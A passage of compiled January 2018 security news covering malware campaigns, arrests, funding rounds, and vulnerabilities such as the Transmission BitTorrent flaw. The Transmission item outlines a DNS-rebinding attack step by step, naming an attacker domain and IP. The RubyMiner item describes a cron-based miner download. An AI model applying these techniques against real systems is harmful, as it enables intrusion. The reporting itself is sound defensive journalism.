Intel initially said only systems running Broadwell and Haswell CPUs experienced more frequent reboots, but similar behavior has also been reported on Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

“We have reproduced these issues internally and are making progress toward identifying the root cause. In parallel, we will be providing beta microcode to vendors for validation by next week,” said Navin Shenoy, executive vice president and general manager of Intel’s Data Center Group.

Many affected vendors, including system manufacturers, have already released patches and workarounds for the Spectre and Meltdown vulnerabilities, but installing them has been known to cause serious problems.

Microsoft’s initial patches prevented systems with some AMD processors from booting, and Canonical’s Meltdown fix broke some devices running Ubuntu. Industrial control systems (ICS) vendors have warned customers that the patches for the CPU vulnerabilities should be thoroughly tested before being installed in order to prevent any disruptions.


Former CIA Agent Arrested With Top Secret Info
18.1.2018 securityweek BigBrothers

US authorities said Tuesday they had arrested a former CIA agent, Hong Kong resident Jerry Chun Shing Lee, after discovering he had an unauthorized notebook that had the identities of undercover US spies.

Lee, a naturalized US citizen also known as Zhen Cheng Li, was arrested late Monday after he arrived at JFK International Airport in New York.

The Department of Justice said Lee, 53, grew up in the United States and served in the US Army before joining the Central Intelligence Agency as a case officer in 1994.

He served in unnamed overseas locations and left the agency in 2007, later apparently taking a job in Hong Kong.

In a complaint filed in a New York federal court, the Justice Department said that in 2012, FBI agents with court-ordered warrants secretly searched Lee's luggage while he was travelling in the United States and found he was carrying top secret materials he was not authorized to have.

"Agents found two small books containing handwritten notes that contained classified information, including but not limited to, true names and phone numbers of assets and covert CIA employees, operational notes from asset meetings, operational meeting locations and locations of covert facilities," the Justice Department said.

Lee was charged with unlawful retention of national defense information, a charge that can bring up to 10 years in prison.

Officials did not say why it took so long to bring charges against Lee, or whether he had leaked any materials to foreign countries.

But the case takes place amid concern in the US intelligence community that the Chinese government has been able to cripple their operations in that country.

The New York Times reported last year that starting in 2010, to the end of 2012, the Chinese killed "at least a dozen" sources the CIA had inside China and imprisoned six or more others.

A hunt for a "mole" in the agency led to one person, a "former operative" now living elsewhere in Asia, the Times said. But there was not enough information to arrest him.

But others in the agency blamed sloppy work and not a mole, the Times added.

Asked about the case at a regular press briefing in Beijing Wednesday, Chinese foreign ministry spokesman Lu Kang said: "I'm not aware of the information you've mentioned."


PureSec Emerges From Stealth With Security Product for Serverless Apps
18.1.2018 securityweek BigBrothers
Tel Aviv, Israel-based startup PureSec emerged from stealth mode on Wednesday with a security platform designed for serverless architectures and a guide that describes the top 10 risks for serverless applications.

Founded by Shaked Zin (CEO), Avi Shulman (VP of R&D) and Ory Segal (CTO), PureSec raised $3 million in May 2017 in a seed round led by TLV Partners.

PureSec’s product is powered by the company’s Serverless Security Runtime Environment (SSRE) technology, which provides a trusted and safe environment for serverless functions.

Applications built on serverless architectures do not require an always-on physical or virtual server. Instead, resources are provided dynamically as Backend-as-a-Service (BaaS) and Function-as-a-Service (FaaS) services. Amazon’s AWS Lambda, Microsoft’s Azure Functions, Google Cloud Functions and IBM BlueMix Cloud Functions are the most popular serverless platforms.PureSec launches serverless security product

Using serverless architectures has many advantages, including the fact that developers can focus on product functionality without having to worry about the server side, including when it comes to applying security patches. However, the developer is still responsible for ensuring that the application is resilient to attacks.

PureSec’s product aims to address this by providing runtime protection via two layers: a firewall and a behavioral engine.

“The first layer, the Serverless Function Firewall, makes sure that input going into the function is safe for usage as event input. It can detect application layer attacks that are relevant for serverless architectures - like NoSQL Injections, SQL Injections, XSS, Local File Inclusion, Runtime Code Injections, etc. It is working on the event-data for the function (the arguments), so it is protocol agnostic and can handle any kind of event triggers (it's not limited to HTTP),” Segal told SecurityWeek.

“Once the function starts executing, our behavioral detection engine monitors ‘operations’ and ‘interactions’ performed by the function in real-time, making sure that only good behaviors are performed. Our research team spent time modeling good behavior, as well as malicious behavior, and we can detect attempts to subvert function logic, attempt to access files in an unauthorized way, attempts to download malware or execute it, or leak data. This is purely behavioral and does not rely on signatures, in order to provide 0-day protection. It's basically positive security applied to function behaviors,” he added.

PureSec’s product, currently available in pre-Beta, has already been tested by various organizations, including a very large US retail company, several global ad tech firms, and some US-based cloud technology firms. Some large US-based companies migrating systems to AWS Lambda may be signed up soon.

The company could not provide any information on pricing and general availability.

Top 10 risks for serverless applications

PureSec has also published a guide describing the top 10 risks for applications built on serverless architectures. The guide, designed for both security and development teams, provides mitigations, best practices, and comparisons to traditional applications.

Inspired by the OWASP Top 10, the document covers issues such as function event data injection, broken authentication, insecure deployment configuration, over-privileged function permissions and roles, inadequate function monitoring and logging, insecure third-party dependencies, insecure application secrets storage, denial-of-service and financial resource exhaustion, serverless function execution flow manipulation, and improper exception handling and verbose error messages.

A study conducted by the company showed that the adoption of serverless architectures has seen exponential growth, but there is a significant gap in knowledge of serverless security.


Threat Intelligence Tech Firm Anomali Raises $40 Million
18.1.2018 securityweek IT
Anomali, a security technology firm that offers a SaaS-based threat intelligence platform, today announced that it has raised $40 million in series D funding.

The additional funding brings the total amount raised to-date by the company to $96 million.

Anomali Logo

According to the company, the investment will help accelerate its growth globally and continue product development.

Formerly known as ThreatStream, the company rebranded itself as Anomali in February 2016.

Headquartered in Redwood City, Calif., the company is led by ArcSight co-founder Hugh Njemanze, who took the role as CEO in July 2014. Njemanze co-founded ArcSight in May 2000 and led product development, information technology deployment and product research leading up to HP’s acquisition of ArcSight for $1.75 billion in 2010.

The Series D round was led by Lumia Capital, with Deutsche Telekom Capital Partners (DTCP), Telstra and Sozo Ventures also participating in the round along with returning investors GV, General Catalyst, IVP and Paladin Capital Group.


Crypto-Mining Attack Targets Web Servers Globally
18.1.2018 securityweek
Attack
A new malware family is targeting web servers worldwide in an attempt to ensnare them into a crypto-mining botnet, security researchers have discovered.

Dubbed RubyMiner, the threat was discovered last week, when it started launching massive attacks on web servers in the United States, Germany, United Kingdom, Norway, and Sweden. Within a single day, the attackers behind this malware attempted to compromise nearly one third of networks globally, Check Point revealed last week.

The purpose of the attack, which is targeting both Windows and Linux servers, is to install a Monero miner by exploiting old vulnerabilities that have been published and patched in 2012 and 2013. The attackers weren’t looking for stealth compromise, but attempted to compromise a large number of vulnerable HTTP web servers as quickly as possible.

The infection campaign is targeting vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails. Despite the large number of compromise attempts observed, only 700 servers worldwide have been successfully enslaved within the first 24 hours of attacks.

The attack on Ruby on Rails attempts to exploit CVE-2013-0156, a remote code execution vulnerability. A base64 encoded payload is delivered inside a POST request, expecting the Ruby interpreter on the server to execute it.

The payload is a bash script designed to add a cronjob that runs every hour and downloads a robots.txt file containing a shell script, designed to fetch and execute the crypto-miner, but not before checking whether it is already active on the host. Not only the mining process, but the entire download and execution operation runs every hour.

“This is possibly to allow the attacker to initiate an immediate kill switch for the miner bot. If the attacker would like to end the process on the infected machines, all that needs to be done is modify the robots.txt file on the compromised webserver to be inactive. Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.

The deployed malware – on all infected servers – is XMRig, a Monero miner that was used in September 2017 in an attack exploiting a vulnerability in Microsoft IIS 6.0, the webserver in Windows Server 2003 R2.

One of the domains used in the newly observed infection campaign is lochjol.com, which was previously used in an attack in 2013. That attack abused the Ruby on Rails vulnerability as well, and also had some features common with the current incident, but the researchers couldn’t determine further connections between the two, especially with their purpose seemingly different.


Threat Actors Quickly Adopt Effective Exploits
18.1.2018 securityweek
Exploit
Cybercriminals and nation state groups were quick to adopt the most effective exploits last year, a new AlienVault report reveals.

Not only do the most effective exploits proliferate quickly between cybercriminals, but some of them remain popular for years after their initial discovery.

The top 10 list of exploits – by number of occurrences in vendor reports – is dominated by Microsoft Office and Microsoft Windows, data from AlienVault’s Open Threat Exchange (OTX) platform reveals. Adobe Flash, Microsoft .NET, and Android/Linux were also present on the list, with one exploit each.

The exploit to appear most often in vendor reports last year was CVE-2017-0199, a code execution bug affecting Microsoft Office. Detailed in April 2017, when it was already being abused in attacks, the vulnerability started being adopted almost immediately, and the trend continued toward the end of the year as well.

The popularity of this exploit continued to grow even after Microsoft released a patch. Originally abused with malicious Rich Text File (RTF) documents, the flaw was leveraged with PowerPoint Slide Show files by August, and threat actors continued to use it in this manner in the following months as well.

Some attackers combined multiple exploits to avoid detection, using CVE-2017-0199 together with CVE-2012-0158, an old Office flaw that is still exploited in many campaigns and which made it to the third position on AlienVault’s top 10 exploits for last year.

The second place went to CVE-2015-1641, an exploit that was already highly popular one year after it became public. Actors exploiting the vulnerability include the Patchwork cyberespionage group and cybercriminals located in Nigeria.

In addition to CVE-2017-0199, three other exploits discovered in 2017 were among the most reported by vendors, namely CVE-2017-0144, CVE-2017-0262, and CVE-2017-8759. A .NET zero-day, CVE-2017-8759 was patched in September, after it was abused to deliver the FinFisher malware to Russian-speaking individuals.

The only exploit targeting operating systems other than Windows that made it to AlienVault’s top 10 list is CVE-2013-6282, targeting a bug leveraged by Android malware to escalate privileges once installed on a victim’s phone.

A Windows 2000 flaw reported in 2001 was encountered the most by AlienVault’s customers, the company reports. Two vulnerabilities from 2017 made it to the top 10 list of exploits seen the most, namely CVE-2017-0144 and CVE-2017-5638 (an Apache Struts bug).

“This data-set is very large, and consists of many billions of security events. However the data is heavily biased towards “noisy” network based exploit attempts from worms and exploit scanners. This explains why we’re still recording ancient vulnerabilities from 2001 in this table,” AlienVault points out.


Briton Pleads Guilty to Running Malware Services
18.1.2018 securityweek
Virus
Goncalo Esteves, a 24-year-old man from the United Kingdom, has pleaded guilty to charges related to creating and running services designed to help cybercriminals develop malware that would not be detected by antivirus products.

One of Esteves’ services was a website called reFUD.me. Created in February 2015, the site allowed cybercriminals to learn if their malware samples would be detected by antiviruses from various vendors. When it was shut down several months later, the service claimed that it had been used to conduct 1.2 million scans.

The man, known online as KillaMuvz also created Cryptex, a tool that allowed malware developers to encrypt their files in an effort to make them more difficult to detect. Cryptex had been available since October 2011, but it had been improved over time.

Use of the reFUD and Cryptex tools was not free. For example, users had to pay $8 per month for the lite version of Cryptex or $90 for a lifetime license for Cryptex Reborn, which experts described as highly sophisticated.

Esteves and a woman were arrested in November 2015 as a result of an investigation conducted by Trend Micro and the UK’s National Crime Agency (NCA). Both services were shut down around the time of their arrest.

A local news site reported in March 2017 that Esteves had pleaded not guilty to four charges of computer misuse and one charge of obtaining money under the Proceeds of Crime Act 2002. The man insisted at the time that his software was designed for legitimate use.

However, the NCA announced this week that Esteves has pleaded guilty to two computer misuse charges and one count of money laundering. He will be sentenced on February 12.

Authorities said Esteves received roughly £32,000 ($44,000) for his services between 2011 and 2015. However, this only represents payments made through PayPal; the actual profit is likely much higher since he also accepted payment in bitcoins and Amazon vouchers.


Zyklon Malware Delivered via Recent Office Flaws
18.1.2018 securityweek
Vulnerebility
A piece of malware known as Zyklon has been delivered by cybercriminals using some relatively new vulnerabilities in Microsoft Office, FireEye reported on Wednesday.

Zyklon has been around since early 2016 and it allows attackers to conduct a wide range of malicious activities, including launch distributed denial-of-service (DDoS) attacks, log keystrokes, steal passwords, and mine cryptocurrency.

A recent campaign observed by FireEye has been aimed at organizations in the telecommunications, insurance and financial services sectors. The malware has been delivered as a ZIP archive attached to spam emails.

The ZIP file contains a specially crafted Word document that exploits one of three weaknesses in Microsoft Office to deliver a PowerShell script that downloads the final Zyklon payload from a remote server.

One of the vulnerabilities exploited by the malicious documents is CVE-2017-8759, a flaw patched by Microsoft in September 2017 after FireEye noticed that it had been exploited to deliver spyware. The security hole was later used by China-linked cyberspies to target organizations in the United States.

Another flaw exploited to deliver Zyklon is CVE-2017-11882, a 17-year-old vulnerability in the Equation Editor component that Microsoft patched in November. CVE-2017-11882 has been leveraged by Iranian cyberspies, the Cobalt hacking group, and others.

Cybercriminals have also abused the Dynamic Data Exchange (DDE) feature in Office to spread the malware. Russia-linked cyberspies and many other threat actors have abused DDE to deliver malware, which ultimately led to Microsoft disabling the feature in all versions of Word in an effort to prevent attacks.

If the malicious documents successfully exploit one of these weaknesses, they download a PowerShell script that injects code and fetches the final payload from a server.

The malware uses the Tor network to communicate with its command and control (C&C) server. Once a connection has been established, the attacker can instruct the malware to provide information about the infected system, launch DDoS attacks, mine cryptocurrency, and upload harvested data.

In addition to built-in functionality, Zyklon has several plugins that can be loaded for additional features. The plugins allow attackers to steal passwords from popular web browsers, FTP and email passwords, keys associated with video games, and software license keys.

The malware can also establish a Socks5 proxy on the infected machine, and it can hijack the clipboard in order to replace Bitcoin addresses copied by the victim with addresses owned by the attacker.


Researchers Earn $100,000 for Hacking Pixel Phone
18.1.2018 securityweek
Vulnerebility
A team of researchers has earned more than $100,000 from Google for an Android exploit chain that can be used to hack the company’s Pixel phone remotely simply by getting the targeted user to access a malicious website.

Google’s Pixel phone was the only device that was not hacked at last year’s Mobile Pwn2Own competition. However, researcher Guang Gong of Chinese security firm Qihoo 360 and his team did manage to find a couple of vulnerabilities that can be chained for a remote code injection exploit that works against Pixel and other Android smartphones.

The exploit relies on two vulnerabilities: CVE-2017-5116 and CVE-2017-14904. The former is a type confusion flaw in the V8 open-source JavaScript engine and it can be exploited for remote code execution in a sandboxed Chrome render process. Google patched this security hole in September with the release of Chrome 61.

The second vulnerability affects Android's libgralloc module and it can be exploited to escape the Chrome sandbox. This privilege escalation flaw was patched by Google in December with its monthly Android updates.

Combining the two vulnerabilities allows an attacker to inject arbitrary code into the system_server process by getting the targeted user to access a malicious URL in Chrome.

Gong and his team earned $105,000 for the exploit chain through the Android Security Rewards (ASR) program, and an additional $7,500 through the Chrome bug bounty program. This is the highest reward in the history of the ASR program, which is not surprising considering that it has been paid out for the first remote exploit chain since the ASR program was expanded last summer.

Google announced at the time that rewards for remote exploit chains or exploits leading to TrustZone or Verified Boot compromise increased to $200,000, and bounties for remote kernel exploits increased to $150,000.

Gong has published a guest post on Google’s security and Android developers blogs detailing both vulnerabilities and how the exploit chain works.


Cisco Patches Flaws in Email Security, Other Products
18.1.2018 securityweek
Vulnerebility
Cisco has patched several high severity vulnerabilities, including ones that allow privilege escalation and denial-of-service (DoS) attacks, in its Unified Customer Voice Portal (CVP), Email Security, and NX-OS products.

Software updates released by the company for its Email Security product address a privilege escalation vulnerability (CVE-2018-0095) that allows a local attacker with guest user permissions to gain root access.

The flaw affects the administrative shell of the Email Security Appliance (ESA) and the Content Security Management Appliance (SMA), and it’s caused by an incorrect networking configuration.

“An attacker could exploit this vulnerability by authenticating to the targeted device and issuing a set of crafted, malicious commands at the administrative shell. An exploit could allow the attacker to gain root access on the device,” Cisco said.

A different high severity vulnerability (CVE-2018-0086) was patched by Cisco in its CVP product. The security hole allows a remote, unauthenticated attacker to cause a DoS condition on the device by sending specially crafted SIP invite traffic to the targeted appliance.

A high severity DoS bug (CVE-2018-0102) has also been patched in the NX-OS network operating system. An unauthenticated attacker with access to the network can leverage the flaw to cause vulnerable devices to reload.

“An attacker could exploit this vulnerability by sending a pong request to an affected device from a location on the network that causes the pong reply packet to egress both a FabricPath port and a non-FabricPath port. An exploit could allow the attacker to cause a dual or quad supervisor virtual port-channel (vPC) to reload,” Cisco said in its advisory.

Cisco has also informed customers of two other vulnerabilities affecting NX-OS, including a DoS and a user account deletion issue, but these have been classified as medium severity and they have yet to be patched.

All of these vulnerabilities have been discovered by Cisco itself and there is no evidence of exploitation for malicious purposes.

Cisco released more than 20 advisories on Wednesday, but a majority describe medium severity flaws for which the company has yet to release any patches.


Google Brings Security Analytics to G Suite
18.1.2018 securityweek Security
Google this week announced security center for G Suite, a tool that brings together security analytics, actionable insights, and best practice recommendations from Google.

The new tool provides a snapshot of important security metrics in one place, including information on suspicious device activity. The security center can be used to gain visibility into how spam and malware are targeting users within an organization, as well as to access metrics to demonstrate security effectiveness.

Security analytics functions help security teams take advantage of insights into which users are being targeted by phishing, allowing them to prevent potential attacks. The security center also displays information on when Google Drive files trigger DLP rules, thus enabling admins to avoid data exfiltration.

Security recommendations, which are based on the analysis of organization’s current security posture, are also available to admins through Security health. Tailored to the organization’s specific needs, these recommendations cover issues such as data storage, file sharing, and mobility and communications settings.

The Security health section also includes information on the number of organizational units for which a setting is enabled or disabled, and details on organizational units with risky configurations. This is where admins can monitor settings for Gmail, Google Drive, and devices, as well as whether two-step verification has been enabled for both users and admins.

Google is making the new features available to G Suite Enterprise customers within the Admin console, which should automatically appear to all qualifying customers within the next few days.

To get started, admins should sign in to their Google Admin console, then click Security, and access Dashboard for an overview of security metrics like spam volume, email authentication, and Drive sharing. By selecting Security health, they can get information on how security settings are configured for the domain and can receive suggestions based on best practices.


Skygofree — Powerful Android Spyware Discovered
17.1.2018 thehackernews Android

Security researchers have unveiled one of the most powerful and highly advanced Android spyware tools that give hackers full control of infected devices remotely.
Dubbed Skygofree, the Android spyware has been designed for targeted surveillance, and it is believed to have been targeting a large number of users for the past four years.
Since 2014, the Skygofree implant has gained several novel features previously unseen in the wild, according to a new report published by Russian cybersecurity firm Kaspersky Labs.
The 'remarkable new features' include location-based audio recording using device's microphone, the use of Android Accessibility Services to steal WhatsApp messages, and the ability to connect infected devices to malicious Wi-Fi networks controlled by attackers.


Skygofree is being distributed through fake web pages mimicking leading mobile network operators, most of which have been registered by the attackers since 2015—the year when the distribution campaign was most active, according to Kaspersky's telemetry data.
Italian IT Firm Behind Skygofree Spyware?

Researchers at Kaspersky Lab believe the hacker or hacking group behind this mobile surveillance tool has been active since 2014 and are based in Italy—the home for the infamous 'Hacking Team'—one of the world's bigger players in spyware trading.
"Given the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam," said the report.
Kaspersky found several Italian devices infected with Skygofree, which the firm described as one of the most powerful, advanced mobile implants it has ever seen.
Although the security firm has not confirmed the name of the Italian company behind this spyware, it found multiple references to Rome-based technology company "Negg" in the spyware's code. Negg is also specialised in developing and trading legal hacking tools.
Skygofree: Powerful Android Spyware Tool
Once installed, Skygofree hides its icon and starts background services to conceal further actions from the user. It also includes a self-protection feature, preventing services from being killed.


As of October last year, Skygofree became a sophisticated multi-stage spyware tool that gives attackers full remote control of the infected device using a reverse shell payload and a command and control (C&C) server architecture.
According to the technical details published by researchers, Skygofree includes multiple exploits to escalate privileges for root access, granting it ability to execute most sophisticated payloads on the infected Android devices.

One such payload allows the implant to execute shellcode and steal data belonging to other applications installed on the targeted devices, including Facebook, WhatsApp, Line, and Viber.
"There are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, [and] never-before-seen surveillance features," the researchers said.
Skygofree’s control (C&C) server also allows attackers to capture pictures and videos remotely, seize call records and SMS, as well as monitor the users' geolocation, calendar events and any information stored in the device's memory.
Besides this, Skygofree also can record audio via the microphone when the infected device was in a specified location and the ability to force the infected device to connect to compromised Wi-Fi networks controlled by the attacker, enabling man-in-the-middle attacks.
The spyware uses "the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages," Kaspersky said.
Kaspersky researchers also found a variant of Skygofree targeting Windows users, suggesting the authors' next area of interest is the Windows platform.
The best way to prevent yourself from being a victim is to avoid downloading apps via third-party websites, app stores or links provided in SMS messages or emails.


Warning: New Undetectable DNS Hijacking Malware Targeting Apple macOS Users
17.1.2018 thehackernews Apple

A security researcher has revealed details of a new piece of undetectable malware targeting Apple's Mac computers—reportedly first macOS malware of 2018.
Dubbed OSX/MaMi, an unsigned Mach-O 64-bit executable, the malware is somewhat similar to DNSChanger malware that infected millions of computers across the world in 2012.
DNSChanger malware typically changes DNS server settings on infected computers, allowing attackers to route internet traffic through malicious servers and intercept sensitive information.
First appeared on the Malwarebytes forum, a user posted a query regarding unknown malware that infected his friend's computer that silently changed DNS settings on infected macOS to 82.163.143.135 and 82.163.142.137 addresses.
After looking at the post, ex-NSA hacker Patrick Wardle analysed the malware and found that it is indeed a 'DNS Hijacker,' which also invokes security tools to install a new root certificate in an attempt to intercept encrypted communications as well.

"OSX/MaMi isn't particularly advanced - but does alter infected systems in rather nasty and persistent ways," Patrick said.
"By installing a new root certificate and hijacking the DNS servers, the attackers can perform a variety of nefarious actions such as man-in-the-middle'ing traffic (perhaps to steal credentials, or inject ads)" or to insert cryptocurrency mining scripts into web pages.
Besides this, the OSX/MaMi macOS malware, which appears to be in its initial stage, also includes below-mentioned abilities, most of which are not currently activated in its version 1.1.0:
Take screenshots
Generate simulated mouse events
Perhaps persist as a launch item
Download and upload files
Execute commands
The motive, author(s) behind the malware, and how it is spreading are currently unknown.
However, Patrick believes that the attackers could be using lame methods like malicious emails, web-based fake security alerts/popups, or social-engineering type attacks to target Mac users.
To check if your Mac computer is infected with MaMi malware, go to the terminal via the System Preferences app and check for your DNS settings—particularly look for 82.163.143.135 and 82.163.142.137.

According to VirusTotal, a multi-engine antivirus scanner, none of 59 popular antivirus software is detecting this malware at this moment, so you are advised to use a 3rd-party tool such as a firewall that can detect and block outgoing traffic.
You can also install a free open-source firewall for macOS named 'LuLu,' created by Patrick and available at GitHub, which blocks suspicious traffic and prevents OSX/MaMi's from stealing your data.


Fourth Fappening Hacker Admits to Stealing Celebrity Pics From iCloud Accounts
17.1.2018 thehackernews Apple

Almost three years after the massive leakage of high-profile celebrities' nude photos—well known as "The Fappening" or "Celebgate" scandal—a fourth hacker has been charged with hacking into over 250 Apple iCloud accounts belonged to Hollywood celebrities.
A federal court has accused George Garofano, 26, of North Branford, of violating the Computer Fraud and Abuse Act, who had been arrested by the FBI.
Garofano has admitted to illegally obtaining credentials for his victims' iCloud accounts using a phishing scheme, which eventually allowed him to steal personal information on his victims, including sensitive and private photographs and videos.
Among celebrities whose nude photographs were posted online back in 2014 are Jennifer Lawrence, Kim Kardashian, Kirsten Dunst, and Kate Upton. Also, female victims also include American Olympic gold medallist Misty May Treanor and actors Alexandra Chando, Kelli Garner and Lauren O’Neil.
Between April 2013 to October 2014, Garofano engaged in sending phishing emails pretended to be from Apple security team to several celebrities, tricking them into providing their iCloud account credentials, which they stole to access their accounts illegally.
"Garofano admitted that he sent emails to victims that appeared to be from security accounts of Apple and encouraged the victims to send him their usernames and passwords, or to enter them on a third-party website, where he would later retrieve them," the Justice Department said.
Besides stealing victims' personal information, including sensitive and private photographs and videos, from their iCloud accounts using stolen credentials, Garofano, in some instances, also traded the stolen credentials, along with the materials he stole from the victims' accounts, with other individuals.
In a plea agreement signed Thursday in U.S. District Court in Los Angeles, Garofano agreed to plead guilty to one count of unauthorised access to a protected computer to obtain information, facing up to 5 years in prison.
Garofano is the fourth hacker charged in connection with the Celebgate incident. Emilio Herrera, 32, Edward Majerczyk, 28, and Ryan Collins, 36, pleaded guilty last year to being involved in the celebrity photo hack.
While Herrera is waiting for sentencing next month, Majerczyk was sentenced to nine months in prison and Collins was sentenced to 18 months last year.
The investigation into the Celebgate scandal is being conducted by the U.S. Federal Bureau of Investigation.


New Mirai Okiru Botnet targets devices running widely-used ARC Processors
17.1.2018 thehackernews BotNet

The cybersecurity threat landscape has never been more extensive and is most likely to grow exponentially in 2018.
Although the original creators of Mirai DDoS botnet have already been arrested and jailed, the variants of the infamous IoT malware are still in the game due to the availability of its source code on the Internet.
Security researchers have spotted a new variant of infamous Mirai IoT malware designed to hijack insecure devices that run on ARC embedded processors.
Until now, Mirai and its variants have been targeting CPU architectures—including x86, ARM, Sparc, MIPS, PowerPC and Motorola 6800—deployed in millions of Internet of Things (IoT) devices.

Dubbed Okiru, the new Mirai variant, first spotted by @unixfreaxjp from MalwareMustDie team and notified by independent researcher Odisseus, is a new piece of ELF malware that targets ARC-based embedded devices running Linux operating system.
"This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!! Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn't been infected yet," Odisseus tweeted.
ARC (Argonaut RISC Core) embedded processor is the world's second-most-popular CPU core that's being shipped in more than 2 billion products every year, including cameras, mobile, utility meters, televisions, flash drives, automotive and the Internet of Things.

However, this isn't first Mirai botnet variant based on Linux ELF malware. Mirai also has another ELF-based variant, which was designed to target devices running MIPS and ARM processors.
It should also be noted that Okiru, which has previously been also named as Satori IoT botnet (another Mirai variant discovered late last year), is "very different" from Satori despite having several similar characteristics, as explained in a Reddit thread.
Record-Breaking DDoS? The Calm Before The Storm
IoTs are currently being deployed in a large variety of devices throughout your home, businesses, hospitals, and even cities (smart cities), but they're routinely being hacked and used as cyber weapons due to lack of stringent security measures and insecure encryption mechanisms.
If you are unaware, the world's largest 1 Tbps DDoS attack so far was launched from just 152,000 infected IoT devices using Mirai botnet, and in a separate attack, just 100,000 devices took down the popular DynDNS service in late 2016.
Since Okiru has been ported to target a new range of millions of "expectedly insecure" devices running ARC processors, the DDoS attack going to be generated by Okiru botnet would probably be the biggest cyberattack ever.
"From this day, the landscape of #Linux #IoT infection will change. #ARC CPU has produced #IoT devices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It's a serious threat will be," Odisseus tweeted.
The fresh arrival of ARC-based IoT devices into botnet scheme will exponentially raise the number of insecure devices to an unprecedented size, making it easy for hackers to gain control over a large number of poorly configured and vulnerable IoT devices.


OnePlus Site’s Payment System Reportedly Hacked to Steal Credit Card Details
17.1.2018 thehackernews CyberCrime

This year's first bad news for OnePlus users—a large number of OnePlus customers are reporting of fraudulent credit card transactions after buying products from the Chinese smartphone manufacturer's official online store.
The claim initially surfaced on the OnePlus support forum over the weekend from a customer who said that two of his credit cards used on the company's official website was suspected of fraudulent activities.
"The only place that both of those credit cards had been used in the last 6 months was on the Oneplus website," the customer wrote.
Later a good number of users posted similar complaints on OnePlus, Twitter and Reddit forums, saying they also became a victim of credit card fraud.
Many of the customers claimed that their credit cards had been compromised after they bought a new phone or some accessories directly from the OnePlus official website, indicating that the leak might have been through the company itself.
Cybersecurity firm Fidus also published a blog post detailing the alleged issue with the OnePlus website's on-site payment system. The firm suspected that the servers of the OnePlus website might have been compromised.

According to Fidus, OnePlus is currently conducting the transactions itself on-site, which means that all billing information along with all credit card details entered by its customers flow through the OnePlus official website and can be intercepted by attackers.
"Whilst the payment details are sent off to a third-party provider upon form submission, there is a window in which malicious code is able to siphon credit card details before the data is encrypted," Fidus wrote.
Fidus went on to clarify that their findings did not in any way confirm that the OnePlus website was breached; instead, they suggested the attacks might have come from the Magento eCommerce platform—which is used by OnePlus and is "a common platform in which credit card hacking takes place."
OnePlus has quickly responded to the issue on its forum, confirming that it does not store any credit card information on its website and all payment transactions are carried out through its PCI-DSS-compliant payment processing partner.
Only credit card-related information of users who have enabled the "save this card for future transactions" feature is stored on OnePlus' official servers, but even they are secured with a token mechanism.
"Our website is HTTPS encrypted, so it's very difficult to intercept traffic and inject malicious code, however we are conducting a complete audit," a company's staffer using the name 'Mingyu' wrote.
The Chinese smartphone maker also confirms that purchases involving third-party services like PayPal are not affected.

OnePlus does not reveal much information on the incident but confirms that its official website is not affected by any Magento vulnerability.
The company confirms that oneplus.net was indeed built on the Magento eCommerce, but said since 2014, it has entirely been re-built using custom code, adding that "credit card payments were never implemented in Magento's payment module at all."
There are almost 100 claims of fraudulent credit card transactions on the OnePlus support forums. OnePlus announces a formal investigation into the matter, and advises affected users to contact their bank to reverse the payment.


Flaw in Popular Transmission BitTorrent Client Lets Hackers Control Your PC Remotely
17.1.2018 thehackernews
Virus

A critical vulnerability has been discovered in the widely used Transmission BitTorrent app that could allow hackers to remotely execute malicious code on BitTorrent users' computers and take control of them.
The vulnerability has been uncovered by Google's Project Zero vulnerability reporting team, and one of its researchers Tavis Ormandy has also posted a proof-of-concept attack—just 40 days after the initial report.
Usually, Project Zero team discloses vulnerabilities either after 90 days of reporting them to the affected vendors or until the vendor has released a patch.
However, in this case, the Project Zero researchers disclosed the vulnerability 50 days prior to the actual time limit because Transmission developers failed to apply a ready-made patch provided by the researchers over a month ago.
"I'm finding it frustrating that the transmission developers are not responding on their private security list, I suggested moving this into the open so that distributions can apply the patch independently. I suspect they won't reply, but let's see," Ormandy said in a public report published Tuesday.
Proof-of-Concept Exploit Made Publicly Available
The PoC attack published by Ormandy exploits a specific Transmission function that lets users control the BitTorrent app with their web browser.
Ormandy confirmed his exploit works on Chrome and Firefox on Windows and Linux (Fedora and Ubuntu) and believes that other browsers and platforms are also vulnerable to the attack.
Transmission BitTorrent app works on server-client architecture, where users have to install a daemon service on their systems in order to access a web-based interface on their browsers locally.
The daemon installed on the user system then interacts with the server for downloading and uploading files through the browser using JSON RPC requests.
Ormandy found that a hacking technique called the "domain name system rebinding" attack could successfully exploit this implementation, allowing any malicious website that user visits to execute malicious code on user's computer remotely with the help of installed daemon service.
Here's How the Attack Works:
The loophole resides in the fact that services installed on localhost can be manipulated to interact with third-party websites.
"I regularly encounter users who do not accept that websites can access services on localhost or their intranet," Ormandy wrote in a separate post, which includes the patch.
"These users understand that services bound to localhost are only accessible to software running on the local machine and that their browser is running on the local machine—but somehow believe that accessing a website "transfers" execution somewhere else. It does not work like that, but this is a common source of confusion."
Attackers can exploit this loophole by simply creating a DNS name they're authorized to communicate with and then making it resolve to the vulnerable computer's localhost name. Here's how the attack works:

A user visits malicious site (http://attacker.com), which has an iframe to a subdomain controlled by the attacker.
The attacker configures their DNS server to respond alternately with 127.0.0.1 and 123.123.123.123 (an address controlled by the attacker) with a very low TTL.
When the browser resolves to 123.123.123.123, it serves HTML that waits for the DNS entry to expire (or force it to terminate by flooding the cache with lookups), then it has permission to read and set headers.
Ormandy said the vulnerability (CVE-2018-5702) was the "first of a few remote code execution flaws in various popular torrent clients," though he did not name the other torrent apps due to the 90-day disclosure timeline.
A fix is expected to be released as soon as possible, a development official with Transmission told ArsTechnica, without specifying an actual date.


LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials
17.1.2018 thehackernews CyberCrime

